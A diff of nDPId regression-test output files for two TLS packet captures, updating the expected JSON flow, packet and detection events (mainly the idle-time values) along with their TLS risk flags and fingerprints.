-01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697574192,"flow_last_seen":1595697574192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697574192,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} +01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} +01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":13775,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1595697597855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/tls_invalid_reads.pcap.out b/test/results/tls_invalid_reads.pcap.out index 0c5b52f86..abe25bf1c 100644 --- a/test/results/tls_invalid_reads.pcap.out +++ b/test/results/tls_invalid_reads.pcap.out @@ -1,18 +1,18 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1252380859868} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} 00211{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1252380859884} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":1252380859868,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} 